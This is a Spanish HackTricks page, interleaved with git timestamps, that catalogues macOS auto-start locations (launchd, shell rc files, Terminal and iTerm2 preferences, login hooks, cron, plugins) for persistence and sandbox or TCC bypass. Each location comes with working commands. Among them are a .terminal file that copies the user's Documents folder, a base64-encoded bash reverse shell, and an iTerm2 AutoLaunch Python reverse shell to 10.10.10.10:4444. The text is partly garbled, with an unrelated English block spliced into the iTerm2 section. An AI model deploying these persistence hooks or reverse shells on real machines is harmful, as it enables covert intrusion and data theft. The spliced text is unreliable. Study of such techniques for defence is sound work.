2023-12-26 02:09:27 +00:00
# Inicio Automático en macOS
2023-06-05 18:30:03 +00:00
< details >
2024-02-13 00:50:14 +00:00
< summary > < strong > Aprende hacking en AWS desde cero hasta experto con< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2023-06-05 18:30:03 +00:00
2023-12-30 23:59:08 +00:00
Otras formas de apoyar a HackTricks:
2024-02-07 05:32:25 +00:00
* Si deseas ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** ¡Consulta los [**PLANES DE SUSCRIPCIÓN** ](https://github.com/sponsors/carlospolop )!
2024-02-13 00:50:14 +00:00
* Obtén [**artículos oficiales de PEASS & HackTricks** ](https://peass.creator-spring.com )
2024-02-07 05:32:25 +00:00
* Descubre [**La Familia PEASS** ](https://opensea.io/collection/the-peass-family ), nuestra colección exclusiva de [**NFTs** ](https://opensea.io/collection/the-peass-family )
2024-02-13 00:50:14 +00:00
* **Únete al** 💬 [**grupo de Discord** ](https://discord.gg/hRep4RUj7f ) o al [**grupo de telegram** ](https://t.me/peass ) o **síguenos** en **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )**.**
* **Comparte tus trucos de hacking enviando PRs a los repositorios de** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) y [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ).
2023-06-05 18:30:03 +00:00
< / details >
2024-02-13 00:50:14 +00:00
Esta sección se basa en gran medida en la serie de blogs [**Más allá de los buenos y viejos LaunchAgents** ](https://theevilbit.github.io/beyond/ ), el objetivo es agregar **más ubicaciones de inicio automático** (si es posible), indicar **qué técnicas siguen funcionando** en la actualidad con la última versión de macOS (13.4) y especificar los **permisos** necesarios.
2023-09-28 20:19:13 +00:00
2024-02-07 05:32:25 +00:00
## Bypass de la Caja de Arena
2023-09-28 20:19:13 +00:00
{% hint style="success" %}
2024-02-08 22:25:00 +00:00
Aquí puedes encontrar ubicaciones de inicio útiles para **bypass de la caja de arena** que te permite simplemente ejecutar algo **escribiéndolo en un archivo** y **esperando** una **acción muy común** , una **cantidad determinada de tiempo** o una **acción que normalmente puedes realizar** desde dentro de una caja de arena sin necesidad de permisos de root.
2023-09-28 20:19:13 +00:00
{% endhint %}
2023-06-05 18:30:03 +00:00
### Launchd
2024-02-07 05:32:25 +00:00
* Útil para bypass de la caja de arena: [✅ ](https://emojipedia.org/check-mark-button )
2023-12-30 01:04:30 +00:00
* Bypass de TCC: [🔴 ](https://emojipedia.org/large-red-circle )
2023-09-28 20:19:13 +00:00
2023-09-28 19:22:43 +00:00
#### Ubicaciones
* **`/Library/LaunchAgents`**
* **Disparador**: Reinicio
2024-02-13 00:50:14 +00:00
* Se requiere root
2023-09-28 19:22:43 +00:00
* **`/Library/LaunchDaemons`**
* **Disparador**: Reinicio
2024-02-13 00:50:14 +00:00
* Se requiere root
2023-09-28 19:22:43 +00:00
* **`/System/Library/LaunchAgents`**
* **Disparador**: Reinicio
2024-02-13 00:50:14 +00:00
* Se requiere root
2023-09-28 19:22:43 +00:00
* **`/System/Library/LaunchDaemons`**
* **Disparador**: Reinicio
2024-02-13 00:50:14 +00:00
* Se requiere root
2023-09-28 19:22:43 +00:00
* **`~/Library/LaunchAgents`**
* **Disparador**: Volver a iniciar sesión
* **`~/Library/LaunchDemons`**
* **Disparador**: Volver a iniciar sesión
2023-12-16 14:31:06 +00:00
#### Descripción y Explotación
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
**`launchd`** es el **primer** **proceso** ejecutado por el kernel de OX S al inicio y el último en finalizar al apagar. Siempre debería tener el **PID 1** . Este proceso leerá y ejecutará las configuraciones indicadas en los **plists** de **ASEP** en:
2023-06-05 18:30:03 +00:00
2023-09-26 23:44:22 +00:00
* `/Library/LaunchAgents` : Agentes por usuario instalados por el administrador
2024-02-07 05:32:25 +00:00
* `/Library/LaunchDaemons` : Demonios de todo el sistema instalados por el administrador
2023-09-26 23:44:22 +00:00
* `/System/Library/LaunchAgents` : Agentes por usuario proporcionados por Apple.
2024-02-07 05:32:25 +00:00
* `/System/Library/LaunchDaemons` : Demonios de todo el sistema proporcionados por Apple.
2023-06-05 18:30:03 +00:00
2024-02-07 05:32:25 +00:00
Cuando un usuario inicia sesión, los plists ubicados en `/Users/$USER/Library/LaunchAgents` y `/Users/$USER/Library/LaunchDemons` se inician con los **permisos de los usuarios conectados** .
2023-06-05 18:30:03 +00:00
2024-02-13 00:50:14 +00:00
**La diferencia principal entre agentes y demonios es que los agentes se cargan cuando el usuario inicia sesión y los demonios se cargan al iniciar el sistema** (ya que hay servicios como ssh que necesitan ejecutarse antes de que cualquier usuario acceda al sistema). Además, los agentes pueden usar la interfaz gráfica mientras que los demonios deben ejecutarse en segundo plano.
2023-06-05 18:30:03 +00:00
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN">
< plist version = "1.0" >
< dict >
2023-09-26 23:44:22 +00:00
< key > Label< / key >
< string > com.apple.someidentifier< / string >
< key > ProgramArguments< / key >
< array >
2023-09-28 19:22:43 +00:00
< string > bash -c 'touch /tmp/launched'< / string > <!-- Prog to execute -->
2023-09-26 23:44:22 +00:00
< / array >
< key > RunAtLoad< / key > < true / > <!-- Execute at system startup -->
< key > StartInterval< / key >
< integer > 800< / integer > <!-- Execute each 800s -->
< key > KeepAlive< / key >
< dict >
< key > SuccessfulExit< / key > < / false > <!-- Re - execute if exit unsuccessful -->
<!-- If previous is true, then re - execute in successful exit -->
< / dict >
2023-06-05 18:30:03 +00:00
< / dict >
< / plist >
```
2024-02-07 05:32:25 +00:00
Hay casos en los que un **agente necesita ser ejecutado antes de que el usuario inicie sesión** , estos se llaman **PreLoginAgents** . Por ejemplo, esto es útil para proporcionar tecnología de asistencia en el inicio de sesión. También se pueden encontrar en `/Library/LaunchAgents` (ver [**aquí** ](https://github.com/HelmutJ/CocoaSampleCode/tree/master/PreLoginAgents ) un ejemplo).
2023-06-05 18:30:03 +00:00
2023-09-28 19:22:43 +00:00
{% hint style="info" %}
2024-02-13 00:50:14 +00:00
Los nuevos archivos de configuración de Daemons o Agents se **cargarán después del próximo reinicio o usando** `launchctl load <target.plist>` También es posible cargar archivos .plist sin esa extensión con `launchctl -F <file>` (sin embargo, esos archivos plist no se cargarán automáticamente después del reinicio).\
2024-02-07 05:32:25 +00:00
También es posible **descargar** con `launchctl unload <target.plist>` (el proceso al que apunta será terminado).
2023-06-05 18:30:03 +00:00
2024-02-07 05:32:25 +00:00
Para **asegurarse** de que no haya **nada** (como una anulación) **impidiendo que un** **Agente** o **Daemon** **se ejecute** , ejecute: `sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.smdb.plist`
2023-09-28 19:22:43 +00:00
{% endhint %}
2023-06-05 18:30:03 +00:00
2024-02-07 05:32:25 +00:00
Listar todos los agentes y daemons cargados por el usuario actual:
2023-06-05 18:30:03 +00:00
```bash
launchctl list
```
2023-11-02 17:51:22 +00:00
{% hint style="warning" %}
2024-02-13 00:50:14 +00:00
Si un plist es propiedad de un usuario, incluso si está en carpetas de sistema de demonios, la **tarea se ejecutará como el usuario** y no como root. Esto puede prevenir algunos ataques de escalada de privilegios.
2023-11-02 17:51:22 +00:00
{% endhint %}
2024-02-13 00:50:14 +00:00
### Archivos de inicio de shell
2023-09-28 19:22:43 +00:00
2023-12-26 02:09:27 +00:00
Writeup: [https://theevilbit.github.io/beyond/beyond\_0001/ ](https://theevilbit.github.io/beyond/beyond\_0001/ )\
Writeup (xterm): [https://theevilbit.github.io/beyond/beyond\_0018/ ](https://theevilbit.github.io/beyond/beyond\_0018/ )
2023-09-28 19:22:43 +00:00
2024-02-13 00:50:14 +00:00
* Útil para evadir la sandbox: [✅ ](https://emojipedia.org/check-mark-button )
2023-12-30 01:04:30 +00:00
* Bypass de TCC: [✅ ](https://emojipedia.org/check-mark-button )
2024-02-07 05:32:25 +00:00
* Pero necesitas encontrar una aplicación con un bypass de TCC que ejecute un shell que cargue estos archivos
2023-09-28 20:19:13 +00:00
2023-09-28 19:22:43 +00:00
#### Ubicaciones
2023-12-30 01:04:30 +00:00
* **`~/.zshrc`, `~/.zlogin` , `~/.zshenv.zwc` **, ** `~/.zshenv` , `~/.zprofile` **
2024-02-07 05:32:25 +00:00
* **Disparador**: Abrir una terminal con zsh
2023-09-28 19:22:43 +00:00
* **`/etc/zshenv`, `/etc/zprofile` , `/etc/zshrc` , `/etc/zlogin` **
2024-02-07 05:32:25 +00:00
* **Disparador**: Abrir una terminal con zsh
* Se requiere permisos de root
2023-09-28 19:22:43 +00:00
* **`~/.zlogout`**
2024-02-07 05:32:25 +00:00
* **Disparador**: Salir de una terminal con zsh
2023-09-28 19:22:43 +00:00
* **`/etc/zlogout`**
2024-02-07 05:32:25 +00:00
* **Disparador**: Salir de una terminal con zsh
* Se requiere permisos de root
2023-09-28 19:22:43 +00:00
* Potencialmente más en: ** `man zsh` **
* **`~/.bashrc`**
2024-02-07 05:32:25 +00:00
* **Disparador**: Abrir una terminal con bash
2023-09-28 19:22:43 +00:00
* `/etc/profile` (no funcionó)
* `~/.profile` (no funcionó)
* `~/.xinitrc` , `~/.xserverrc` , `/opt/X11/etc/X11/xinit/xinitrc.d/`
2024-02-08 22:25:00 +00:00
* **Disparador**: Se espera que se active con xterm, pero **no está instalado** y incluso después de instalarlo se muestra este error: xterm: `DISPLAY is not set`
2023-09-28 19:22:43 +00:00
2023-12-26 02:09:27 +00:00
#### Descripción y Explotación
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
Al iniciar un entorno de shell como `zsh` o `bash` , se ejecutan **ciertos archivos de inicio** . Actualmente, macOS utiliza `/bin/zsh` como shell predeterminado. Este shell se accede automáticamente cuando se inicia la aplicación Terminal o cuando se accede a un dispositivo a través de SSH. Aunque `bash` y `sh` también están presentes en macOS, deben ser invocados explícitamente para ser utilizados.
2023-09-28 19:22:43 +00:00
2023-12-30 01:04:30 +00:00
La página de manual de zsh, que podemos leer con ** `man zsh` **, tiene una larga descripción de los archivos de inicio.
2023-09-28 19:22:43 +00:00
```bash
# Example executino via ~/.zshrc
echo "touch /tmp/hacktricks" >> ~/.zshrc
```
2023-12-30 23:59:08 +00:00
### Aplicaciones Reabiertas
2023-09-28 19:22:43 +00:00
2023-09-28 20:19:13 +00:00
{% hint style="danger" %}
2024-02-07 05:32:25 +00:00
Configurar la explotación indicada y cerrar sesión e iniciar sesión o incluso reiniciar no funcionó para mí para ejecutar la aplicación. (La aplicación no se estaba ejecutando, tal vez necesita estar en ejecución cuando se realizan estas acciones)
2023-09-28 20:19:13 +00:00
{% endhint %}
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
**Descripción**: [https://theevilbit.github.io/beyond/beyond\_0021/ ](https://theevilbit.github.io/beyond/beyond\_0021/ )
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
* Útil para evadir el sandbox: [✅ ](https://emojipedia.org/check-mark-button )
* Bypass de TCC: [🔴 ](https://emojipedia.org/large-red-circle )
2023-09-28 19:22:43 +00:00
2023-09-28 20:19:13 +00:00
#### Ubicación
2023-09-28 19:22:43 +00:00
2023-09-28 20:19:13 +00:00
* **`~/Library/Preferences/ByHost/com.apple.loginwindow.< UUID > .plist`**
2024-02-08 22:25:00 +00:00
* **Disparador**: Reiniciar la reapertura de aplicaciones
2023-09-28 19:22:43 +00:00
2023-12-26 02:09:27 +00:00
#### Descripción y Explotación
2023-09-28 20:19:13 +00:00
2024-02-07 05:32:25 +00:00
Todas las aplicaciones a reabrir están dentro del plist `~/Library/Preferences/ByHost/com.apple.loginwindow.<UUID>.plist`
2023-09-28 20:19:13 +00:00
2024-02-13 00:50:14 +00:00
Por lo tanto, para hacer que las aplicaciones reabiertas lancen la suya propia, solo necesita **agregar su aplicación a la lista** .
2023-09-28 20:19:13 +00:00
2024-02-08 22:25:00 +00:00
El UUID se puede encontrar listando ese directorio o con `ioreg -rd1 -c IOPlatformExpertDevice | awk -F'"' '/IOPlatformUUID/{print $4}'`
2023-09-28 20:19:13 +00:00
2024-02-13 00:50:14 +00:00
Para verificar las aplicaciones que se reabrirán, puede hacer:
2023-09-28 20:19:13 +00:00
```bash
defaults -currentHost read com.apple.loginwindow TALAppsToRelaunchAtLogin
#or
plutil -p ~/Library/Preferences/ByHost/com.apple.loginwindow.< UUID > .plist
2023-09-28 19:22:43 +00:00
```
2023-09-28 20:19:13 +00:00
Para **agregar una aplicación a esta lista** puedes usar:
2023-09-28 19:22:43 +00:00
```bash
2023-09-28 20:19:13 +00:00
# Adding iTerm2
/usr/libexec/PlistBuddy -c "Add :TALAppsToRelaunchAtLogin: dict" \
-c "Set :TALAppsToRelaunchAtLogin:$:BackgroundState 2" \
-c "Set :TALAppsToRelaunchAtLogin:$:BundleID com.googlecode.iterm2" \
-c "Set :TALAppsToRelaunchAtLogin:$:Hide 0" \
-c "Set :TALAppsToRelaunchAtLogin:$:Path /Applications/iTerm.app" \
~/Library/Preferences/ByHost/com.apple.loginwindow.< UUID > .plist
2023-09-28 19:22:43 +00:00
```
2023-10-01 18:11:55 +00:00
### Preferencias de Terminal
2024-02-13 00:50:14 +00:00
* Útil para evitar el sandbox: [✅ ](https://emojipedia.org/check-mark-button )
2024-02-07 05:32:25 +00:00
* Bypass de TCC: [✅ ](https://emojipedia.org/check-mark-button )
* Terminal usa permisos de FDA si el usuario lo utiliza
2023-10-01 18:11:55 +00:00
#### Ubicación
* **`~/Library/Preferences/com.apple.Terminal.plist`**
2024-02-07 05:32:25 +00:00
* **Desencadenante**: Abrir Terminal
2023-10-01 18:11:55 +00:00
#### Descripción y Explotación
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
En ** `~/Library/Preferences` ** se almacenan las preferencias del usuario en las aplicaciones. Algunas de estas preferencias pueden contener una configuración para **ejecutar otras aplicaciones/scripts** .
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
Por ejemplo, Terminal puede ejecutar un comando al iniciar:
2023-09-28 19:22:43 +00:00
2023-09-28 20:19:13 +00:00
< figure > < img src = "../.gitbook/assets/image (676).png" alt = "" width = "495" > < figcaption > < / figcaption > < / figure >
Esta configuración se refleja en el archivo ** `~/Library/Preferences/com.apple.Terminal.plist` ** de la siguiente manera:
2023-09-28 19:22:43 +00:00
```bash
[...]
2023-09-28 20:19:13 +00:00
"Window Settings" => {
"Basic" => {
"CommandString" => "touch /tmp/terminal_pwn"
"Font" => {length = 267, bytes = 0x62706c69 73743030 d4010203 04050607 ... 00000000 000000cf }
"FontAntialias" => 1
"FontWidthSpacing" => 1.004032258064516
"name" => "Basic"
"ProfileCurrentVersion" => 2.07
"RunCommandAsShell" => 0
"type" => "Window Settings"
}
2023-09-28 19:22:43 +00:00
[...]
```
2024-02-07 05:32:25 +00:00
Entonces, si se pudiera sobrescribir el plist de las preferencias del terminal en el sistema, la funcionalidad ** `open` ** se puede utilizar para **abrir el terminal y ejecutar ese comando** .
2023-09-28 20:19:13 +00:00
2024-02-13 00:50:14 +00:00
Puedes agregar esto desde la línea de comandos con:
2023-09-28 19:22:43 +00:00
{% code overflow="wrap" %}
```bash
# Add
2023-09-28 20:19:13 +00:00
/usr/libexec/PlistBuddy -c "Set :\"Window Settings\":\"Basic\":\"CommandString\" 'touch /tmp/terminal-start-command'" $HOME/Library/Preferences/com.apple.Terminal.plist
/usr/libexec/PlistBuddy -c "Set :\"Window Settings\":\"Basic\":\"RunCommandAsShell\" 0" $HOME/Library/Preferences/com.apple.Terminal.plist
2023-09-28 19:22:43 +00:00
# Remove
2023-09-28 20:19:13 +00:00
/usr/libexec/PlistBuddy -c "Set :\"Window Settings\":\"Basic\":\"CommandString\" ''" $HOME/Library/Preferences/com.apple.Terminal.plist
2023-09-28 19:22:43 +00:00
```
{% endcode %}
2023-12-17 01:07:29 +00:00
### Scripts de Terminal / Otras extensiones de archivo
2023-10-01 18:11:55 +00:00
2024-02-07 05:32:25 +00:00
* Útil para evadir el sandbox: [✅ ](https://emojipedia.org/check-mark-button )
* Bypass de TCC: [✅ ](https://emojipedia.org/check-mark-button )
* El uso de Terminal permite tener permisos de FDA si el usuario lo utiliza
2023-10-01 18:11:55 +00:00
#### Ubicación
* **En cualquier lugar**
2024-02-07 05:32:25 +00:00
* **Desencadenante**: Abrir Terminal
2023-10-01 18:11:55 +00:00
#### Descripción y Explotación
2024-02-13 00:50:14 +00:00
Si creas un script [**`.terminal`** ](https://stackoverflow.com/questions/32086004/how-to-use-the-default-terminal-settings-when-opening-a-terminal-file-osx ) y lo abres, la **aplicación Terminal** se invocará automáticamente para ejecutar los comandos indicados en él. Si la aplicación Terminal tiene algunos privilegios especiales (como TCC), tu comando se ejecutará con esos privilegios especiales.
2023-10-01 18:11:55 +00:00
Pruébalo con:
```bash
# Prepare the payload
cat > /tmp/test.terminal < < EOF
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
< plist version = "1.0" >
< dict >
< key > CommandString< / key >
< string > mkdir /tmp/Documents; cp -r ~/Documents /tmp/Documents;< / string >
< key > ProfileCurrentVersion< / key >
< real > 2.0600000000000001< / real >
< key > RunCommandAsShell< / key >
< false / >
< key > name< / key >
< string > exploit< / string >
< key > type< / key >
< string > Window Settings< / string >
< / dict >
< / plist >
EOF
# Trigger it
open /tmp/test.terminal
# Use something like the following for a reverse shell:
< string > echo -n "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYxOw==" | base64 -d | bash;< / string >
```
2024-02-07 05:32:25 +00:00
### Extensiones de Audio
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
Descripción: [https://theevilbit.github.io/beyond/beyond\_0013/ ](https://theevilbit.github.io/beyond/beyond\_0013/ )\
Descripción: [https://posts.specterops.io/audio-unit-plug-ins-896d3434a882 ](https://posts.specterops.io/audio-unit-plug-ins-896d3434a882 )
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
* Útil para evadir el sandbox: [✅ ](https://emojipedia.org/check-mark-button )
* Bypass de TCC: [🟠 ](https://emojipedia.org/large-orange-circle )
* Podrías obtener acceso adicional a TCC
2023-12-30 01:04:30 +00:00
2023-09-28 20:19:13 +00:00
#### Ubicación
* **`/Library/Audio/Plug-Ins/HAL`**
2024-02-07 05:32:25 +00:00
* Se requieren permisos de root
* **Disparador**: Reiniciar coreaudiod o la computadora
2023-09-28 20:19:13 +00:00
* **`/Library/Audio/Plug-ins/Components`**
2024-02-07 05:32:25 +00:00
* Se requieren permisos de root
* **Disparador**: Reiniciar coreaudiod o la computadora
2023-09-28 20:19:13 +00:00
* **`~/Library/Audio/Plug-ins/Components`**
2024-02-07 05:32:25 +00:00
* **Disparador**: Reiniciar coreaudiod o la computadora
2023-09-28 20:19:13 +00:00
* **`/System/Library/Components`**
2024-02-07 05:32:25 +00:00
* Se requieren permisos de root
* **Disparador**: Reiniciar coreaudiod o la computadora
2023-09-28 20:19:13 +00:00
#### Descripción
2024-02-07 05:32:25 +00:00
Según las descripciones anteriores, es posible **compilar algunos plugins de audio** y cargarlos.
2023-09-28 20:19:13 +00:00
2024-02-07 05:32:25 +00:00
### Extensiones de QuickLook
2023-09-28 20:19:13 +00:00
2024-02-07 05:32:25 +00:00
Descripción: [https://theevilbit.github.io/beyond/beyond\_0028/ ](https://theevilbit.github.io/beyond/beyond\_0028/ )
2023-09-28 20:19:13 +00:00
2024-02-07 05:32:25 +00:00
* Útil para evadir el sandbox: [✅ ](https://emojipedia.org/check-mark-button )
* Bypass de TCC: [🟠 ](https://emojipedia.org/large-orange-circle )
* Podrías obtener acceso adicional a TCC
2023-09-28 19:22:43 +00:00
#### Ubicación
2023-09-28 20:19:13 +00:00
* `/System/Library/QuickLook`
* `/Library/QuickLook`
* `~/Library/QuickLook`
2024-02-13 00:50:14 +00:00
* `/Applications/AppNameHere/Contents/Library/QuickLook/`
* `~/Applications/AppNameHere/Contents/Library/QuickLook/`
2023-09-28 19:22:43 +00:00
2023-12-26 02:09:27 +00:00
#### Descripción y Explotación
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
Las extensiones de QuickLook se pueden ejecutar cuando **se activa la vista previa de un archivo** (presionando la barra espaciadora con el archivo seleccionado en Finder) y se instala un **plugin que admita ese tipo de archivo** .
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
Es posible compilar tu propia extensión de QuickLook, colocarla en una de las ubicaciones anteriores para cargarla y luego ir a un archivo compatible y presionar espacio para activarla.
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
### ~~Ganchos de Inicio/Cierre de Sesión~~
2023-09-28 19:22:43 +00:00
2023-09-28 20:19:13 +00:00
{% hint style="danger" %}
2024-02-07 05:32:25 +00:00
Esto no funcionó para mí, ni con el LoginHook de usuario ni con el LogoutHook de root
2023-09-28 20:19:13 +00:00
{% endhint %}
2024-02-07 05:32:25 +00:00
**Descripción**: [https://theevilbit.github.io/beyond/beyond\_0022/ ](https://theevilbit.github.io/beyond/beyond\_0022/ )
2023-09-28 20:19:13 +00:00
2024-02-07 05:32:25 +00:00
* Útil para evadir el sandbox: [✅ ](https://emojipedia.org/check-mark-button )
* Bypass de TCC: [🔴 ](https://emojipedia.org/large-red-circle )
2023-09-28 20:19:13 +00:00
#### Ubicación
* Necesitas poder ejecutar algo como `defaults write com.apple.loginwindow LoginHook /Users/$USER/hook.sh`
2024-02-07 05:32:25 +00:00
* `Lo` calizado en `~/Library/Preferences/com.apple.loginwindow.plist`
2023-09-28 20:19:13 +00:00
2024-02-07 05:32:25 +00:00
Están obsoletos pero se pueden usar para ejecutar comandos cuando un usuario inicia sesión.
2023-09-28 19:22:43 +00:00
```bash
2023-09-28 20:19:13 +00:00
cat > $HOME/hook.sh < < EOF
#!/bin/bash
echo 'My is: \`id\`' > /tmp/login_id.txt
EOF
chmod +x $HOME/hook.sh
defaults write com.apple.loginwindow LoginHook /Users/$USER/hook.sh
defaults write com.apple.loginwindow LogoutHook /Users/$USER/hook.sh
2023-09-28 19:22:43 +00:00
```
2024-02-07 05:32:25 +00:00
Este ajuste se almacena en `/Users/$USER/Library/Preferences/com.apple.loginwindow.plist`
2023-09-28 19:22:43 +00:00
```bash
2023-09-28 20:19:13 +00:00
defaults read /Users/$USER/Library/Preferences/com.apple.loginwindow.plist
{
LoginHook = "/Users/username/hook.sh";
LogoutHook = "/Users/username/hook.sh";
MiniBuddyLaunch = 0;
TALLogoutReason = "Shut Down";
TALLogoutSavesState = 0;
oneTimeSSMigrationComplete = 1;
}
2023-09-28 19:22:43 +00:00
```
2023-09-28 20:19:13 +00:00
Para eliminarlo:
```bash
defaults delete com.apple.loginwindow LoginHook
defaults delete com.apple.loginwindow LogoutHook
```
2024-02-07 05:32:25 +00:00
El usuario root se almacena en ** `/private/var/root/Library/Preferences/com.apple.loginwindow.plist` **
2023-09-28 20:19:13 +00:00
2024-02-13 00:50:14 +00:00
## Bypass de Sandbox Condicional
2023-09-28 20:19:13 +00:00
{% hint style="success" %}
2024-02-13 00:50:14 +00:00
Aquí puedes encontrar ubicaciones de inicio útiles para **bypass de sandbox** que te permite simplemente ejecutar algo **escribiéndolo en un archivo** y **esperando condiciones no muy comunes** como programas específicos instalados, acciones de usuario "poco comunes" o entornos.
2023-09-28 19:22:43 +00:00
{% endhint %}
2023-06-05 18:30:03 +00:00
### Cron
2024-02-07 05:32:25 +00:00
**Descripción**: [https://theevilbit.github.io/beyond/beyond\_0004/ ](https://theevilbit.github.io/beyond/beyond\_0004/ )
2023-09-28 19:22:43 +00:00
2024-02-13 00:50:14 +00:00
* Útil para bypass de sandbox: [✅ ](https://emojipedia.org/check-mark-button )
2023-09-28 20:19:13 +00:00
* Sin embargo, necesitas poder ejecutar el binario `crontab`
* O ser root
2024-01-10 06:28:19 +00:00
* Bypass de TCC: [🔴 ](https://emojipedia.org/large-red-circle )
2023-09-28 20:19:13 +00:00
2023-09-28 19:22:43 +00:00
#### Ubicación
* **`/usr/lib/cron/tabs/`, `/private/var/at/tabs` , `/private/var/at/jobs` , `/etc/periodic/` **
2024-02-07 05:32:25 +00:00
* Se requiere ser root para acceso de escritura directa. No se requiere ser root si puedes ejecutar `crontab <archivo>`
2023-09-28 19:22:43 +00:00
* **Disparador**: Depende del trabajo cron
2023-09-28 20:19:13 +00:00
#### Descripción y Explotación
2023-09-28 19:22:43 +00:00
2023-06-05 18:30:03 +00:00
Lista los trabajos cron del **usuario actual** con:
```bash
crontab -l
```
2024-02-07 05:32:25 +00:00
También puedes ver todos los trabajos cron de los usuarios en ** `/usr/lib/cron/tabs/` ** y ** `/var/at/tabs/` ** (necesita permisos de root).
2023-06-05 18:30:03 +00:00
2023-12-30 23:59:08 +00:00
En MacOS se pueden encontrar varias carpetas que ejecutan scripts con **cierta frecuencia** en:
2023-06-05 18:30:03 +00:00
```bash
2023-09-28 20:19:13 +00:00
# The one with the cron jobs is /usr/lib/cron/tabs/
2023-06-05 18:30:03 +00:00
ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /etc/periodic/
```
2024-02-13 00:50:14 +00:00
Allí puedes encontrar las **tareas cron** regulares, las **tareas at** (poco utilizadas) y las **tareas periódicas** (principalmente utilizadas para limpiar archivos temporales). Las tareas periódicas diarias se pueden ejecutar, por ejemplo, con: `periodic daily` .
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
Para agregar un **trabajo cron de usuario programáticamente** es posible utilizar:
2023-09-28 19:22:43 +00:00
```bash
echo '* * * * * /bin/bash -c "touch /tmp/cron3"' > /tmp/cron
crontab /tmp/cron
```
2023-09-28 20:19:13 +00:00
### iTerm2
2024-02-07 05:32:25 +00:00
Descripción: [https://theevilbit.github.io/beyond/beyond\_0002/ ](https://theevilbit.github.io/beyond/beyond\_0002/ )
2023-09-28 19:22:43 +00:00
2024-02-08 22:25:00 +00:00
* Útil para evadir la sandbox: [✅ ](https://emojipedia.org/check-mark-button )
2024-02-07 05:32:25 +00:00
* Bypass de TCC: [✅ ](https://emojipedia.org/check-mark-button )
* iTerm2 solía tener permisos TCC otorgados
2023-09-28 19:22:43 +00:00
2023-09-28 20:19:13 +00:00
#### Ubicaciones
2023-06-05 18:30:03 +00:00
2023-09-28 20:19:13 +00:00
* **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch`**
* **Disparador**: Abrir iTerm
* **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch.scpt`**
* **Disparador**: Abrir iTerm
* **`~/Library/Preferences/com.googlecode.iterm2.plist`**
* **Disparador**: Abrir iTerm
#### Descripción y Explotación
2024-02-13 00:50:14 +00:00
Los scripts almacenados en ** `~/Library/Application Support/iTerm2/Scripts/AutoLaunch` ** se ejecutarán. Por ejemplo:
2023-06-05 18:30:03 +00:00
```bash
2023-09-28 20:19:13 +00:00
cat > "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.sh" < < EOF
#!/bin/bash
touch /tmp/iterm2-autolaunch
EOF
2023-09-28 19:22:43 +00:00
2023-09-28 20:19:13 +00:00
chmod +x "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.sh"
```
2024-02-07 05:32:25 +00:00
### macOS Auto Start Locations
2024-01-10 06:28:19 +00:00
2024-02-07 05:32:25 +00:00
#### Launch Agents
2024-01-10 06:28:19 +00:00
2024-02-13 00:50:14 +00:00
Launch Agents are used to run processes when a user logs in. They are stored in `~/Library/LaunchAgents/` and `/Library/LaunchAgents/` .
2024-01-10 06:28:19 +00:00
2024-02-07 05:32:25 +00:00
#### Launch Daemons
2024-01-10 06:28:19 +00:00
2024-02-13 00:50:14 +00:00
Launch Daemons are used to run processes at system startup. They are stored in `/Library/LaunchDaemons/` .
2024-01-10 06:28:19 +00:00
2024-02-07 05:32:25 +00:00
#### Login Items
2024-01-10 06:28:19 +00:00
2024-02-13 00:50:14 +00:00
Login Items are applications that open when a user logs in. They can be managed in `System Preferences > Users & Groups > Login Items` .
2024-01-10 06:28:19 +00:00
2024-02-07 05:32:25 +00:00
#### Startup Items
2024-01-10 06:28:19 +00:00
2024-02-13 00:50:14 +00:00
Startup Items are legacy items that automatically launch when a user logs in. They are stored in `/Library/StartupItems/` .
2023-11-02 17:51:22 +00:00
```bash
cat > "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.py" < < EOF
#!/usr/bin/env python3
import iterm2,socket,subprocess,os
async def main(connection):
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.10.10',4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['zsh','-i']);
async with iterm2.CustomControlSequenceMonitor(
connection, "shared-secret", r'^create-window$') as mon:
while True:
match = await mon.async_get()
await iterm2.Window.async_create(connection)
iterm2.run_forever(main)
EOF
```
2023-09-28 20:19:13 +00:00
El script ** `~/Library/Application Support/iTerm2/Scripts/AutoLaunch.scpt` ** también se ejecutará:
```bash
do shell script "touch /tmp/iterm2-autolaunchscpt"
```
2024-02-07 05:32:25 +00:00
El archivo de preferencias de iTerm2 ubicado en ** `~/Library/Preferences/com.googlecode.iterm2.plist` ** puede **indicar un comando a ejecutar** cuando se abre el terminal de iTerm2.
2023-09-28 19:22:43 +00:00
2024-02-07 05:32:25 +00:00
Esta configuración se puede ajustar en la configuración de iTerm2:
2023-09-28 19:22:43 +00:00
